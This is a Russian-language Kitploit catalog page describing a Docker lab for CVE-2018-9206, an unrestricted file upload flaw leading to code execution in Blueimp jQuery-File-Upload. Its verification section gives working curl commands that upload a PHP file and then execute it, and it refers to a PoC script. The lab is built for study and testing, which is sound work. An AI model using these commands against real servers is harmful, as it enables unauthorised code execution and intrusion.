Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-9206-jquery-file-upload — Лабораторная среда на основе Docker для CVE-2018-9206 (Blueimp jQuery-File-Upload — неограниченная загрузка файлов, приводящая к RCE) с PoC-скриптами и командами проверки. | Kitploit
Инструменты/GitHubGitHub/flame-11/cve-2018-9206-jquery-file-upload
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеЛаборатории и Практика
GitHubflame-11/cve-2018-9206-jquery-file-upload

CVE-2018-9206-jquery-file-upload

Лабораторная среда на основе Docker для CVE-2018-9206 (Blueimp jQuery-File-Upload — неограниченная загрузка файлов, приводящая к RCE) с PoC-скриптами и командами проверки.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
17 месяцев назадЕщё не проверено

CVE-2018-9206 - лаборатория Blueimp jQuery-File-Upload

Уязвимое Docker-окружение для CVE-2018-9206 - неограниченная загрузка файлов в Blueimp jQuery-File-Upload <= 9.22.0.

Быстрый старт

root@kitploit:~
docker compose up -d --build

Приложение доступно по адресу: http://localhost:8888/jQuery-File-Upload/

Проверка

root@kitploit:~
# Upload a PHP file
curl -X POST "http://localhost:8888/jQuery-File-Upload/server/php/index.php" \
  -F 'files[]=@/dev/stdin;filename=test.php' <<< '<?php echo "CVE-2018-9206-PWNED"; ?>'

# Execute it
curl "http://localhost:8888/jQuery-File-Upload/server/php/files/test.php"
# Output: CVE-2018-9206-PWNED

Или запустите PoC-скрипт:

root@kitploit:~
./scripts/poc.sh

Очистка

root@kitploit:~
docker compose down -v

Подробности

ПолеЗначение
CVECVE-2018-9206
ПродуктBlueimp jQuery-File-Upload
Версия9.22.0
ТипНеограниченная загрузка файлов → RCE

Ссылки

  • https://nvd.nist.gov/vuln/detail/CVE-2018-9206
  • http://www.vapidlabs.com/advisory.php?v=204
  • https://www.exploit-db.com/exploits/45790/
Скачать инструмент
CVSS9.8 (Критический)